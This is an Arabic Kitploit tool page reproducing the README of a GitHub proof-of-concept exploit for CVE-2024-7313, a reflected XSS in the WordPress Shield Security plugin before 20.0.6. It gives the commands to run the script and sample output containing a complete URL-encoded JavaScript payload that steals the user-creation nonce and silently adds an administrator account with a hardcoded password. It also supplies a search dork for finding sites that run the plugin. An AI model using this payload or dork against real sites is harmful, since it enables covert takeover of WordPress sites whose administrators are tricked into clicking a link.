Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-7313 — إثبات مفهوم مخصص حول XSS لإنشاء حساب مدير غير مصرح به عبر إضافة ووردبريس Shield Security < 20.0.6 | Kitploit
أدوات/GitHubGitHub/wayne-ker/cve-2024-7313
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubwayne-ker/cve-2024-7313

CVE-2024-7313

إثبات مفهوم مخصص حول XSS لإنشاء حساب مدير غير مصرح به عبر إضافة ووردبريس Shield Security < 20.0.6

عرض المستودع
31منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال ثغرة إضافة Shield Security (CVE-2024-7313)

Kali Linux Works on My Machine Sleep Deprivation

نظرة عامة

يحتوي هذا المستودع على سكربت Python (PoC) مصمم لاستغلال ثغرة XSS المنعكسة (Reflected XSS) في إضافة Shield Security لـ WordPress، والتي تؤثر على الإصدارات الأقدم من 20.0.6. تسمح هذه الثغرة (CVE-2024-7313) للمهاجم بإنشاء رابط ضار مخصص للهدف، وعندما ينقر عليه مسؤول الموقع، يقوم الاستغلال بإنشاء حساب مسؤول غير مصرح به عبر XSS. يكتشف السكربت تلقائيًا التثبيتات المعرضة للخطر ويُنشئ حمولة (payload) لاستغلال الثغرة.

معلومات الثغرة

  • CVE: CVE-2024-7313
  • الإضافة: Shield Security < 20.0.6
  • درجة الخطورة: عالية
  • الأنظمة المتأثرة: مواقع WordPress التي تستخدم إصدارات إضافة Shield Security < 20.0.6
  • نوع الهجوم: برمجة نصية عبر المواقع منعكسة (Reflected Cross-Site Scripting - XSS)
  • تاريخ النشر: 7 أغسطس 2024
  • OWASP TOP-10: A7: البرمجة النصية عبر المواقع (XSS)

طريقة الاستخدام

المتطلبات الأساسية

  • Python 3.x
  • مكتبتا requests و beautifulsoup4

قم بتثبيت المكتبات المطلوبة باستخدام:

root@kitploit:~
pip install requests beautifulsoup4

تشغيل السكربت

  1. استنسخ المستودع:
root@kitploit:~
git clone https://github.com/Wayne-Ker/CVE-2024-7313.git
cd CVE-2024-7313
  1. شغّل السكربت مع عنوان URL الهدف:
root@kitploit:~
python3 exploit.py <target_url>

مثال:

root@kitploit:~
python3 exploit.py http://127.0.0.1

بعد إدخال التفاصيل المطلوبة للمستخدم المسؤول الجديد (اسم المستخدم، البريد الإلكتروني، الاسم الأول، اسم العائلة)، سيُنشئ السكربت عنوان URL للحمولة (payload). يمكنك لصق هذا العنوان في متصفحك لتنفيذ هجوم XSS المنعكس، والذي سينشئ مستخدمًا مسؤولًا جديدًا في موقع WordPress.

  1. مثال على المخرجات:
root@kitploit:~
#############################################################################
#                                                                           #
#                                                                           #
#   ______     _______     ____   ___ ____  _  _       _____ _____ _ _____  #
#  / ___\ \   / | ____|   |___ \ / _ |___ \| || |     |___  |___ // | ___/  #
# | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ / /  |_ \| | |_ \  #
# | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____/ /  ___) | |___) | #
#  \____|  \_/  |_____|   |_____|\___|_____|  |_|      /_/  |____/|_|____/  #
#                                                                           #
#    Shield Security Plugin Vulnerability (CVE-2024-7313)                   #
#    Reflected XSS in WordPress Shield Security Plugin                      #
#    Versions Affected: < 20.0.6                                            #
#    Risk: High                                                             #
#    Developed by: Wayne-Kerr                                              #
#    Published: August 7, 2024                                              #
############################################################################# 
Shield Security version is vulnerable. Let's continue.
Enter username: fakename
Enter email: [email protected]
Enter first name: Haxor
Enter last name: test

Using hardcoded password: HaxorStrongAFPassword123!!

Generated XSS Payload URL: http://127.0.0.1/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=%3Cscript%3Evar%20xhrNonce%20%3D%20new%20XMLHttpRequest%28%29%3B%20xhrNonce.open%28%27GET%27%2C%20%27/wp-admin/user-new.php%27%2C%20true%29%3B%20xhrNonce.onload%20%3D%20function%28%29%20%7B%20if%20%28xhrNonce.status%20%3D%3D%3D%20200%29%20%7B%20var%20nonce%20%3D%20xhrNonce.responseText.match%28/name%3D%22_wpnonce_create-user%22%20value%3D%22%28%5Ba-zA-Z0-9%5D%2B%29%22/%29%5B1%5D%3B%20var%20xhr%20%3D%20new%20XMLHttpRequest%28%29%3B%20xhr.open%28%27POST%27%2C%20%27/wp-admin/user-new.php%27%2C%20true%29%3B%20xhr.setRequestHeader%28%27Content-Type%27%2C%20%27application/x-www-form-urlencoded%27%29%3B%20xhr.setRequestHeader%28%27Referer%27%2C%20%27http%3A//127.0.0.1/wp-admin/user-new.php%27%29%3B%20xhr.setRequestHeader%28%27Origin%27%2C%20%27http%3A//127.0.0.1%27%29%3B%20var%20params%20%3D%20%27action%3Dcreateuser%26_wpnonce_create-user%3D%27%20%2B%20nonce%20%2B%20%27%26_wp_http_referer%3D%252Fwp-admin%252Fuser-new.php%26user_login%3Dnick%26email%3Dnick%2540test.com%26first_name%3Dnick%26last_name%3Dtest%26url%3Dtest%26pass1%3DHaxorStrongAFPassword123%2521%2521%26pass2%3DHaxorStrongAFPassword123%2521%2521%26role%3Dadministrator%26createuser%3DAdd%2BNew%2BUser%27%3B%20xhr.send%28params%29%3B%20xhr.onload%20%3D%20function%28%29%20%7B%20if%20%28xhr.status%20%3D%3D%20200%29%20%7B%20console.log%28%27Admin%20user%20created%20successfully%27%29%3B%20window.location.href%20%3D%20%27http%3A//127.0.0.1/wp-admin/admin.php%3Fpage%3Dicwp-wpsf-plugin%26nav%3Ddashboard%26nav_sub%3Doverview%27%3B%20%7D%20else%20%7B%20console.log%28%27Error%20occurred%3A%20%27%20%2B%20xhr.statusText%29%3B%20%7D%20%7D%3B%20%7D%20else%20%7B%20console.log%28%27Error%20fetching%20nonce%3A%20%27%20%2B%20xhrNonce.statusText%29%3B%20%7D%20%7D%3B%20xhrNonce.send%28%29%3B%3C/script%3E

بمجرد زيارة عنوان URL الخاص بحمولة XSS المُنشأة، سيتم تنفيذ الاستغلال، وسيتم إنشاء مستخدم مسؤول جديد على موقع WordPress المستهدف.

قائمة المساعدة

يمكنك الوصول إلى قائمة المساعدة عن طريق تشغيل:

root@kitploit:~
python3 exploit.py -h

Dork للعثور على المواقع المعرضة للخطر

لتحديد المواقع التي تستخدم الإضافة المعرضة للخطر، يمكنك استخدام عبارة البحث (dork) التالية:

root@kitploit:~
inurl:"/wp-content/plugins/wp-simple-firewall/"

سيساعدك هذا في العثور على المواقع التي تم تثبيت إضافة Shield Security عليها. يرجى ملاحظة أن رقم الإصدار غير مرئي للعموم، لذلك قد يكون الاختبار اليدوي ضروريًا.

كيف يعمل

  • يتحقق السكربت أولاً مما إذا كان تثبيت WordPress المستهدف يستخدم إصدارًا معرضًا للخطر من إضافة Shield Security من خلال فحص الاستجابة من صفحة wp-login.php.
  • إذا كان إصدار الإضافة معرضًا للخطر، فإنه يتابع توليد حمولة XSS منعكسة والتي، عند تنفيذها، ستنشئ مستخدمًا مسؤولًا جديدًا بكلمة مرور مكتوبة بشكل ثابت (hardcoded).
  • يتم إنشاء الحمولة لاستخدام طلب GET أولاً للعثور ديناميكيًا على رمز nonce الخاص بـ WordPress المستخدم لإنشاء الحساب، ثم استخدام هذا الرمز لإرسال طلب POST إلى نقطة نهاية إنشاء المستخدم مع تفاصيل المستخدم الجديد المعطاة في السكربت.
  • ثم يتم ترميز الحمولة بتنسيق URL وعرضها لاستخدامها في الهجوم.
  • بمجرد إرسال الرابط إلى مسؤول الموقع والنقر عليه، سيتم إنشاء مستخدم مسؤول جديد على الموقع بالتفاصيل التي حللها السكربت. يتم كل هذا في الخلفية، حيث يتم إعادة توجيه المسؤول المخدوع إلى لوحة تحكم Shield Security دون أي دليل على الاستغلال الجاري في الخلفية.

إخلاء مسؤولية

هذه الأداة مخصصة للأغراض التعليمية فقط ويجب استخدامها فقط في بيئات اختبار الاختراق المصرح بها. الوصول غير المصرح به أو استخدام أنظمة لا تملكها يعد غير قانوني. المؤلف غير مسؤول عن أي إساءة استخدام لهذه الأداة.

الترخيص

هذا المشروع مرخص بموجب رخصة MIT.

تنزيل الأداة